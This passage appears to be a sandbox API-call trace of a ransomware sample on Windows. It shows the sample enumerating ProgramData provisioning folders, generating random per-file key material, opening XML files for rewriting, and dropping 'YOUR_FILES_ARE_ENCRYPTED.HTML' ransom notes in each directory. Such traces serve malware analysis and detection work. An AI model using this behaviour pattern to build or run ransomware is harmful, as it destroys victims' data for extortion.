returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" [0107.137] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.138] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0107.138] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cef80, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18cef80, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18cef80, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.138] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.138] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml") returned 100 [0107.138] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.138] lstrlenW (lpString=".xml") returned 4 [0107.138] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.138] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.138] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.138] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.138] CloseHandle (hObject=0x314) returned 1 [0107.138] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.138] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.138] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned 85 [0107.138] GetProcessHeap () returned 0x600000 [0107.138] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.139] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" [0107.139] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*" [0107.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0107.139] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.139] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.139] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.139] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned 93 [0107.139] GetProcessHeap () returned 0x600000 [0107.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.140] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime" [0107.140] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*" [0107.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0107.140] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.141] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.141] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.141] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.141] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.141] lstrlenW (lpString=".provxml") returned 8 [0107.141] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.141] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0 [0107.141] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0107.141] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.141] GetProcessHeap () returned 0x600000 [0107.141] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.141] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.141] WriteFile (in: hFile=0x32c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.142] CloseHandle (hObject=0x32c) returned 1 [0107.143] GetProcessHeap () returned 0x600000 [0107.143] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.143] GetProcessHeap () returned 0x600000 [0107.143] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.144] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18a8d11, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18a8d11, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.144] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.144] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml") returned 97 [0107.144] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.144] lstrlenW (lpString=".xml") returned 4 [0107.144] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.144] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.144] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=348) returned 1 [0107.144] CloseHandle (hObject=0x32c) returned 1 [0107.144] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18a8d11, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18a8d11, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.144] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0107.145] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.145] GetProcessHeap () returned 0x600000 [0107.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.145] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.145] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.146] CloseHandle (hObject=0x314) returned 1 [0107.147] GetProcessHeap () returned 0x600000 [0107.147] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.147] GetProcessHeap () returned 0x600000 [0107.147] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.147] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.147] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.148] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.148] GetProcessHeap () returned 0x600000 [0107.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.148] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.149] CloseHandle (hObject=0x308) returned 1 [0107.149] GetProcessHeap () returned 0x600000 [0107.149] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.149] GetProcessHeap () returned 0x600000 [0107.149] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.150] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", cAlternateFileName="{F1189~1")) returned 1 [0107.151] StrStrIW (lpFirst="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.151] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned 80 [0107.151] GetProcessHeap () returned 0x600000 [0107.151] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.152] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" [0107.152] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*" [0107.152] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.155] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.156] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0fddd6c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0107.156] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.157] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned 99 [0107.158] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.158] lstrlenW (lpString=".xml") returned 4 [0107.158] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.158] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.158] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.164] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=3494) returned 1 [0107.164] GetProcessHeap () returned 0x600000 [0107.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0107.166] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3C") returned 2 [0107.166] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="37") returned 2 [0107.166] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="77") returned 2 [0107.166] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="E1") returned 2 [0107.166] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="25") returned 2 [0107.166] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="AE") returned 2 [0107.166] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="6A") returned 2 [0107.166] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="2A") returned 2 [0107.166] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="4C") returned 2 [0107.166] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="C3") returned 2 [0107.166] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="62") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="96") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="C2") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="A1") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="2E") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="42") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="EE") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="43") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="6C") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="89") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="85") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="3F") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="C8") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="8C") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="99") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B0") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="8D") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A8") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="CD") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="A2") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="E2") returned 2 [0107.167] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4E") returned 2 [0107.168] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" 